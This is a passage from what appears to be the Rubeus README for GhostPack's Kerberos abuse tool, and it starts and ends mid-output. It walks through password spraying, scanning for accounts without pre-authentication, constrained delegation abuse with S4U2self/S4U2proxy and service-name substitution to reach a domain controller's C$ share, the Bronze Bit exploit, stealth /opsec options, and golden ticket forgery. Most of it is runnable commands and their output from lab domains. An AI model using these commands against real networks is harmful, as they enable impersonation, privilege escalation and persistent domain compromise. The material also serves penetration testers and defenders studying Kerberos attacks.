PM\r\n[*] renew-till : 2/17/2019 6:44:09 PM\r\n[*] Sleeping for 263 minutes (endTime-30) before the next renewal\r\n[*] Renewing TGT for dfm.a@TESTLAB.LOCAL\r\n[*] Action: Renew TGT\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1506 bytes\r\n[*] Received 1510 bytes\r\n[+] TGT renewal request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\nbrute\r\nThe brute action will perform a Kerberos-based password bruteforcing or password spraying attack. spray can\r\nalso be used as the action name.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 27 of 100\n\nC:\\Rubeus\u003eRubeus.exe brute /password:Password123!! /noticket\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[-] Blocked/Disabled user =\u003e Guest\r\n[-] Blocked/Disabled user =\u003e DefaultAccount\r\n[-] Blocked/Disabled user =\u003e krbtgt\r\n[-] Blocked/Disabled user =\u003e disabled\r\n[+] STUPENDOUS =\u003e newuser:Password123!!\r\n[*] base64(newuser.kirbi):\r\n doIFLDCCBSigAwIBBaEDAgEWooIELDCCBChhggQkMIIEIKADAgEFoRAbDlR...(snip)...\r\npreauthscan\r\nThe preauthscan action will send AS-REQ's for all usernames passed into the /users argument to discover\r\naccounts that do not require Kerberos pre-authentication.\r\nC:\\Rubeus\u003eRubeus.exe preauthscan /users:uns.txt /domain:semperis.lab /dc:192.168.71.220\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.2.0\r\n[*] Action: Scan for accounts not requiring Kerberos Pre-Authentication\r\n[*] cclark: Pre-Auth Required\r\n[*] jjones: Pre-Auth Not Required\r\n[*] rwilliams: Pre-Auth Required\r\n[*] svc_sqlserver: Pre-Auth Required\r\n[*] pgreen: Pre-Auth Required\r\n[*] jsmith: Pre-Auth Required\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 28 of 100\n\n[*] tnahum: Pre-Auth Required\r\n[*] sfederovsky: Pre-Auth Required\r\nConstrained delegation abuse\r\nBreakdown of the constrained delegation commands:\r\nCommand Description\r\ns4u Perform S4U2self and S4U2proxy actions\r\ns4u\r\nThe s4u action is nearly identical to Kekeo's tgs::s4u functionality. If a user (or computer) account is configured\r\nfor constrained delegation (i.e. has a SPN value in its msds-allowedtodelegateto field) this action can be used to\r\nabuse access to the target SPN/server. Constrained delegation is complex. For more information see this post or\r\nElad Shamir's \"Wagging the Dog\" post.\r\nA TL;DR explanation is that an account with constrained delegation enabled is allowed to request tickets to itself\r\nas any user, in a process known as S4U2self. In order for an account to be allowed to do this, it has to have\r\nTrustedToAuthForDelegation enabled in it's useraccountcontrol property, something that only elevated users can\r\nmodify by default. This ticket has the FORWARDABLE flag set by default. The service can then use this\r\nspecially requested ticket to request a service ticket to any service principal name (SPN) specified in the account's\r\nmsds-allowedtodelegateto field. So long story short, if you have control of an account with\r\nTrustedToAuthForDelegation set and a value in msds-allowedtodelegateto, you can pretend to be any user in\r\nthe domain to the SPNs set in the account's msds-allowedtodelegateto field.\r\nThis \"control\" can be the hash of the account ( /rc4 or /aes256 ), or an existing TGT ( /ticket:X ) for the\r\naccount with a msds-allowedtodelegateto value set. If a /user and rc4/aes256 hash is supplied, the s4u module\r\nperforms an asktgt action first, using the returned ticket for the steps following. If a TGT /ticket:X is supplied,\r\nthat TGT is used instead.\r\nIf an account hash is supplied, the /nopac switch can be used to request the initial TGT without a PAC.\r\nUsing a KDC proxy (MS-KKDCP) to make the requests is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, eg. https://kdcproxy.exmaple.com/kdcproxy. When used for the s4u\r\ncommand, all requests will be sent through the proxy.\r\nA /impersonateuser:X parameter MUST be supplied to the s4u module. If nothing else is supplied, just the\r\nS4U2self process is executed, returning a forwardable ticket:\r\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:dfm.a\r\n ______ _\r\n(_____ \\ | |\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 29 of 100\n\n_____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1377 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'TESTLAB.LOCAL\\patsy'\r\n[*] Sending S4U2self request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1437 bytes\r\n[*] Received 1574 bytes\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'dfm.a@TESTLAB.LOCAL' to 'TESTLAB.LOCAL\\patsy'\r\n[*] base64(ticket.kirbi):\r\n doIF2jCCBdagAwIBBaEDAgEWoo...(snip)...\r\nThat forwardable ticket can then be used as a /tgs:Y parameter (base64 blob or .kirbi file) to execute the\r\nS4U2proxy process. A valid msds-allowedtodelegateto value for the account must be supplied ( /msdsspn:X ).\r\nSay the patsy@testlab.local account looks like this:\r\nPS C:\\\u003e Get-DomainUser patsy -Properties samaccountname,msds-allowedtodelegateto | Select -Expand msds-allowedt\r\nldap/PRIMARY.testlab.local/testlab.local\r\nldap/PRIMARY\r\nldap/PRIMARY.testlab.local/TESTLAB\r\nldap/PRIMARY/TESTLAB\r\nldap/PRIMARY.testlab.local/DomainDnsZones.testlab.local\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 30 of 100\n\nldap/PRIMARY.testlab.local/ForestDnsZones.testlab.local\r\nldap/PRIMARY.testlab.local\r\nThen the S4U2proxy abuse function (using the ticket from the previous S4U2self process) would be:\r\nC:\\Rubeus\u003eRubeus.exe s4u /ticket:doIE+jCCBPagAwIBBaEDAgEWoo..(snip).. /msdsspn:\"ldap/PRIMARY.testlab.local\" /tg\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: S4U\r\n[*] Loaded a TGS for TESTLAB.LOCAL\\dfm.a@TESTLAB.LOCAL\r\n[*] Impersonating user 'dfm.a@TESTLAB.LOCAL' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 2641 bytes\r\n[*] Received 1829 bytes\r\n[+] S4U2proxy success!\r\n[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':\r\n doIGujCCBragAwIBBaEDAgEWoo..(snip)..\r\nWhere /ticket:X is the TGT returned in the first step, and /tgs is the S4U2self ticket. Injecting the resulting\r\nticket (manually with Rubeus.exe ptt /ticket:X or by supplying the /ptt flag to the s4u command) will allow\r\nyou access the ldap service on primary.testlab.local as if you are dfm.a.\r\nThe /altservice parameter takes advantage of Alberto Solino's great discovery about how the service name\r\n(sname) is not protected in the KRB-CRED file, only the server name is. This allows us to substitute in any\r\nservice name we want in the resulting KRB-CRED (.kirbi) file. One or more alternate service names can be\r\nsupplied, comma separated ( /altservice:cifs,HOST,... ).\r\nLet's expand on the previous example, forging access to the filesystem on primary.testlab.local by abusing its\r\nconstrained delegation configuration and the alternate service substitution. Let's package it all into one step as\r\nwell, performing a TGT request, S4U2self process, S4U2proxy execution, and injection of the final ticket:\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nAccess is denied.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 31 of 100\n\nC:\\Rubeus\u003eRubeus.exe s4u /user:patsy /rc4:2b576acbe6bcfda7294d6bd18041b8fe /impersonateuser:dfm.a /msdsspn:\"ldap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\patsy'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1377 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIE+jCCBPagAwIBBaEDAgEWoo..(snip)..\r\n[*] Action: S4U\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2self request for: 'TESTLAB.LOCAL\\patsy'\r\n[*] Sending S4U2self request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1437 bytes\r\n[*] Received 1574 bytes\r\n[+] S4U2self success!\r\n[*] Got a TGS for 'dfm.a@TESTLAB.LOCAL' to 'TESTLAB.LOCAL\\patsy'\r\n[*] base64(ticket.kirbi):\r\n doIF2jCCBdagAwIBBaEDAgEWoo..(snip)..\r\n[*] Impersonating user 'dfm.a' to target SPN 'ldap/PRIMARY.testlab.local'\r\n[*] Final ticket will be for the alternate service 'cifs'\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'\r\n[*] Sending S4U2proxy request\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 2641 bytes\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 32 of 100\n\n[*] Received 1829 bytes\r\n[+] S4U2proxy success!\r\n[*] Substituting alternative service name 'cifs'\r\n[*] base64(ticket.kirbi) for SPN 'cifs/PRIMARY.testlab.local':\r\n doIGujCCBragAwIBBaEDAgEWoo..(snip)..\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003edir \\\\primary.testlab.local\\C$\r\nVolume in drive \\\\primary.testlab.local\\C$ has no label.\r\nVolume Serial Number is A48B-4D68\r\nDirectory of \\\\primary.testlab.local\\C$\r\n07/05/2018 12:57 PM \u003cDIR\u003e dumps\r\n03/05/2017 04:36 PM \u003cDIR\u003e inetpub\r\n08/22/2013 07:52 AM \u003cDIR\u003e PerfLogs\r\n04/15/2017 05:25 PM \u003cDIR\u003e profiles\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files\r\n08/28/2018 11:51 AM \u003cDIR\u003e Program Files (x86)\r\n10/09/2018 12:04 PM \u003cDIR\u003e Temp\r\n08/23/2018 03:52 PM \u003cDIR\u003e Users\r\n10/25/2018 01:15 PM \u003cDIR\u003e Windows\r\n 1 File(s) 9 bytes\r\n 9 Dir(s) 40,511,676,416 bytes free\r\nBy default, several differences exists between the S4U2Self and S4U2Proxy TGS-REQ's generated by Rubeus and\r\ngenuine requests. To form the TGS-REQ's more inline with genuine requests, the /opsec flag can be used. As\r\nthis flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any encryption type\r\nother than aes256 and will just throw a warning and exit if another encryption type is used. To allow for other\r\nencryption types to be used with the /opsec changes, the /force flag exists. The /opsec flag has not yet\r\nbeen implemented for cross domain S4U.\r\nThe Bronze Bit exploit (CVE-2020-17049) is implemented using the /bronzebit flag. Adding this flag will\r\nautomatically flip the forwardable flag when retreiving the S4U2Self ticket. As flipping this flag requires the\r\nservice ticket to be decrypted and reencrypted, the long term key (service account's password hash) is required.\r\nFor this reason, if a TGT is being supplied, the service accounts credentials are also required for this to work.\r\nIt is possible, in certain cirsumstances, to use an S4U2Self ticket to impersonate protected users in order to\r\nescalate privileges on the requesting system, as discussed here. For this purpose, the /self flag and\r\n/altservice:X argument can be used to generate a usable service ticket.\r\nTo forge an S4U2Self referral, only the trust key is required. By using the /targetdomain:X argument with the\r\n/self flag and without the /targetdc argument, Rubeus will treat the ticket supplied with /ticket:X as an\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 33 of 100\n\nS4U2Self referral and only request the final S4U2Self service ticket. The /altservice:X can also be used to\r\nrewrite the sname in the resulting ticket:\r\nC:\\Rubeus\u003eRubeus.exe s4u /self /targetdomain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /impersonateuse\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: S4U\r\n[*] Action: S4U\r\n[*] Using domain controller: idc1.internal.zeroday.lab (192.168.71.20)\r\n[*] Requesting the cross realm 'S4U2Self' for external.admin@external.zeroday.lab from idc1.internal.zeroday.lab\r\n[*] Sending cross realm S4U2Self request\r\n[+] cross realm S4U2Self success!\r\n[*] Substituting alternative service name 'host/isql1.internal.zeroday.lab'\r\n[*] base64(ticket.kirbi):\r\n doIFETCCBQ...RheS5sYWI=\r\nTicket Forgery\r\nBreakdown of the ticket forgery commands:\r\nCommand Description\r\ngolden Forge an ticket granting ticket (TGT)\r\nsilver Forge a service ticket, can also forge TGTs\r\ndiamond Forge a diamond ticket\r\nThere are many similarities between the golden and silver commands, the reason for them being separate is\r\nto simplfy the golden command. Service tickets can be much more complex than TGTs with different keys and\r\nextra sections, while TGTs can be forged with the silver command, golden provides fewer potential\r\narguments as the features not relevent to TGTs are not present.\r\nMost of the arguments for both of these commands are to set PAC fields and should be reasonably self explanitory.\r\nThese are:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 34 of 100\n\nArgument Description\r\n/user\r\nUsed as the user to query details for if /ldap is passed but also is used to set the\r\nEffectiveName field in the PAC and the cname field in the EncTicketPart\r\n/dc\r\nSpecifies the domain controller used for the LDAP query if /ldap is passed but also\r\nused to set the LogonServer field in the PAC\r\n/netbios Sets the LogonDomainName field in the PAC\r\n/sid Sets the LogonDomainId field in the PAC\r\n/id Sets the UserId field in the PAC (Default: 500)\r\n/displayname Sets the FullName field in the PAC\r\n/logoncount Sets the LogonCount field in the PAC (Default: 0)\r\n/badpwdcount Sets the BadPasswordCount field in the PAC (Default: 0)\r\n/uac Sets the UAC field in the PAC (Default: NORMAL_ACCOUNT)\r\n/pgid\r\nSets the PrimaryGroupId field in the PAC and is also added to the /groups field\r\n(Default: 513)\r\n/groups\r\nComma separated. Sets the Groups field in the PAC, also has the /pgid added to it.\r\nThe total is also used to calculate the GroupCount field (Default: 520,512,513,519,518)\r\n/homedir Sets the HomeDirectory field in the PAC\r\n/homedrive Sets the HomeDirectoryDrive field in the PAC\r\n/profilepath Sets the ProfilePath field in the PAC\r\n/scriptpath Sets the LogonScript field in the PAC\r\n/logofftime\r\nSets the LogoffTime field in the PAC. In local time format - Is converted to UTC\r\nautomatically\r\n/lastlogon\r\nSets the LogonTime field in the PAC. In local time format - Is converted to UTC\r\nautomatically (Default: starttime - 1 second)\r\n/passlastset\r\nSets the PasswordLastSet field in the PAC. In local time format - Is converted to UTC\r\nautomatically\r\n/minpassage\r\nSets the PasswordCanChange field in the PAC. This is relative to PasswordLastSet, in\r\nnumber of days, so '5' for 5 days\r\n/maxpassage\r\nSets the PasswordMustChange field in the PAC. This is relative to PasswordLastSet, in\r\nnumber of days, so '5' for 5 days\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 35 of 100\n\nArgument Description\r\n/sids\r\nComma separated. Sets the ExtraSIDs field in the PAC. It is also used to calculate the\r\nExtraSIDCount field\r\n/resourcegroupsid Sets the ResourceGroupSid field in the PAC. If used, /resourcegroups is also required\r\n/resourcegroups\r\nComma separated. Sets the ResourceGroups field in the PAC. It is also used to calculate\r\nthe ResourceGroupCount field. If used, /resourcegroupsid is also required\r\nOther arguments common to both commands but to set fields outside of the PAC are:\r\nArgument Description\r\n/authtime\r\nSets the authtime field in the EncTicketPart. In local time format - Is converted to UTC\r\nautomatically (Default: now)\r\n/starttime\r\nSets the starttime field in the EncTicketPart. In local time format - Is converted to UTC\r\nautomatically (Default: now)\r\n/endtime\r\nSets the endtime field in the EncTicketPart. This is relative to starttime, in the format of\r\nmultiplier plus timerange, so for 5 days, 5d. More information on this format explained\r\nbelow (Default: 10h)\r\n/renewtill\r\nSets the renew-till field in the EncTicketPart. This is relative to starttime, in the format of\r\nmultiplier plus timerange, so for 5 days, 5d. More information on this format explained\r\nbelow (Default: 7d)\r\n/rangeend\r\nThis is for creating multiple tickets that start at different times. This will be the last\r\nstarttime, relative to /starttime , in the format of multiplier plus timerange, so for 5\r\ndays, 5d. More information on this format explained below\r\n/rangeinterval\r\nThis is for creating multiple tickets that starts are different times. This is the interval that\r\nwill be used between each starttime, in the format of multiplier plus timerange, so for 5\r\ndays, 5d. More information on this format explained below\r\n/flags\r\nSets the ticket flags within the EncTicketPart (Default:\r\nforwardable,renewable,pre_authent and for golden also initial)\r\n/extendedupndns\r\nIncludes the new extended UpnDns (which includes the samaccountname and account\r\nSID)\r\nFor the relative times described in the tables above, the format is an integer used as a multiplier followed by a\r\nsingle character which acts as a timerange. The meaning of each supported character is shown in the table below\r\n(These are case sensitive):\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 36 of 100\n\nCharacter Description\r\nm Minutes\r\nh Hours\r\nd Days\r\nM Months\r\ny Years\r\nThe other common feature used by both commands is LDAP information retrieval. Both golden and silver\r\nsupport retrieving information over LDAP using the /ldap flag. The /ldap flag can be used with the\r\n/creduser and credpassword arguments to authenticate as an alternative user when retrieving this information.\r\nThe inforamtion is retrieved by sending 3 LDAP queries and mounting the SYSVOL share of a domain controller\r\n(for reading the Domain policy file) if no other information is passed. LDAP queries will automatically be sent\r\nover TLS and fail back to plaintext LDAP if it fails.\r\nThe first LDAP query, which will always be sent if ldap is passed, queries for the user specified in /user , and\r\nretreives most of the users information required for the PAC.\r\nThe second LDAP query will be sent if /groups , /pgid , /minpassage OR /maxpassage are not given on the\r\ncommand line, any of these arguments given on the command line will avoid querying LDAP for the information.\r\nThis query retrieves the groups that the user is a member of, including the primary group, along with the domain\r\npolicy object (used to get the path to the policy file). If /minpassage or /maxpassage is not provided on the\r\ncommand line and the domain policy object is retrieved from LDAP, the SYSVOL share of a DC is mounted and\r\nthe policy file is parsed to get the MinimumPasswordAge (to set the proper value for the PasswordCanChange\r\nfield in the PAC) and the MaximumPasswordAge (to set the proper value for the PasswordMustChange field in\r\nthe PAC) values.\r\nLastly, if the /netbios argument is not given on the command line, an LDAP query for the proper netbios name\r\nof the domain is made from the Configuration container in order to set the LogonDomainName field in the PAC.\r\nIf the /ldap flag is not given on the command line and the /netbios argument also is not given, the first\r\nelement (before the first period '.') is uppercased and used instead.\r\nThe /printcmd flag can be used to print the arguments required to generate another ticket containing the same\r\nPAC information used to generate the current ticket. This will not print arguments related to the times the ticket is\r\nvalid for as those are likely required to be different for any future tickets you want to forge.\r\ngolden\r\nThe golden action will forge a TGT for the user /user:X encrypting the ticket with the hash passed with\r\n/des:X , /rc4:X , /aes128:X or /aes256:X and using the same key to create the ServerChecksum and\r\nKDCChecksum. The various arguments to set fields manually are described above or the /ldap flag can be used\r\nto automatically retrieve the information from the domain controller.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 37 of 100\n\nThe /oldpac switch can be used to exclude the new Requestor and Attributes PAC_INFO_BUFFERs, added in\r\nresponse to CVE-2021-42287.\r\nThe /extendedupndns switch will include the new extended UpnDns elements. This involved adding 2 to the\r\nFlags, as well as containing the samaccountname and account SID.\r\nThe /rodcNumber:x parameter was added to perform kerberos Key List Requests. The value of this parameter is\r\nthe number specified after krbtgt_x the msDS-KrbTgtLink attribute of the read-only domain controller, eg.\r\nkrbtgt_12345 would be 12345. This request requires certain flags which can be set using\r\n/flags:forwardable,renewable,enc_pa_rep . The key ( /des:X , /rc4:X , /aes128:X or /aes256:X ) used to\r\nencrypt is the KRBTGT_x accounts key. Further information can be found on Elad Shamir's blog post here,\r\nForging a TGT using the /ldap flag to retrieve the information and the /printcmd flag to print a command to\r\nforge another ticket with the same PAC information:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /ldap /use\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=harmj0y)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 38 of 100\n\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 00:12:40\r\n[*] StartTime : 29/07/2021 00:12:40\r\n[*] EndTime : 29/07/2021 10:12:40\r\n[*] RenewTill : 05/08/2021 00:12:40\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Printing a command to recreate a ticket containing the information used within this ticket\r\nC:\\Rubeus\\Rubeus.exe golden /aes256:6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5 /user:harmj\r\nForging a TGT, explicitly setting everything on the command line:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5 /user:harm\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Building PAC\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 39 of 100\n\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 00:18:19\r\n[*] StartTime : 29/07/2021 00:18:19\r\n[*] EndTime : 29/07/2021 10:18:19\r\n[*] RenewTill : 05/08/2021 00:18:19\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\nForging 5 TGTs starting on different days with 1 day interval between starttimes, with the first starting now, and\r\nusing LDAP to get the PAC information:\r\nC:\\Rubeus\u003eRubeus.exe golden /aes256:6a8941dcb801e0bf63444b830e5faabec24b442118ec60def839fd47a10ae3d5 /ldap /use\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Build TGT\r\n[*] Trying to query LDAP using LDAPS for user information on domain controller PDC1.rubeus.ghostpack.local\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 40 of 100\n\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(samaccountname=harmj0y)'\r\n[*] Retrieving domain policy information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'DC=rubeus,DC=ghostpack,DC=local' for '(|(objectsid=S-1-5-21-3237111427-1607930709-3979055039\r\n[*] Attempting to mount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully mounted\r\n[*] Attempting to unmount: \\\\pdc1.rubeus.ghostpack.local\\SYSVOL\r\n[*] \\\\pdc1.rubeus.ghostpack.local\\SYSVOL successfully unmounted\r\n[*] Retrieving netbios name information over LDAP from domain controller PDC1.rubeus.ghostpack.local\r\n[*] Searching path 'CN=Configuration,DC=rubeus,DC=ghostpack,DC=local' for '(\u0026(netbiosname=*)(dnsroot=rubeus.ghos\r\n[*] Building PAC\r\n[*] Domain : RUBEUS.GHOSTPACK.LOCAL (RUBEUS)\r\n[*] SID : S-1-5-21-3237111427-1607930709-3979055039\r\n[*] UserId : 1106\r\n[*] Groups : 513\r\n[*] ServiceKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] KDCKey : 6A8941DCB801E0BF63444B830E5FAABEC24B442118EC60DEF839FD47A10AE3D5\r\n[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n[*] Service : krbtgt\r\n[*] Target : rubeus.ghostpack.local\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 'harmj0y@rubeus.ghostpack.local'\r\n[*] AuthTime : 29/07/2021 00:22:38\r\n[*] StartTime : 29/07/2021 00:22:38\r\n[*] EndTime : 29/07/2021 10:22:38\r\n[*] RenewTill : 05/08/2021 00:22:38\r\n[*] base64(ticket.kirbi):\r\n doIFdTCCBXGgAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n dWJldXMuZ2hvc3RwYWNrLmxvY2Fs\r\n[*] Generating EncTicketPart\r\n[*] Signing PAC\r\n[*] Encrypting EncTicketPart\r\n[*] Generating Ticket\r\n[*] Generated KERB-CRED\r\n[*] Forged a TGT for 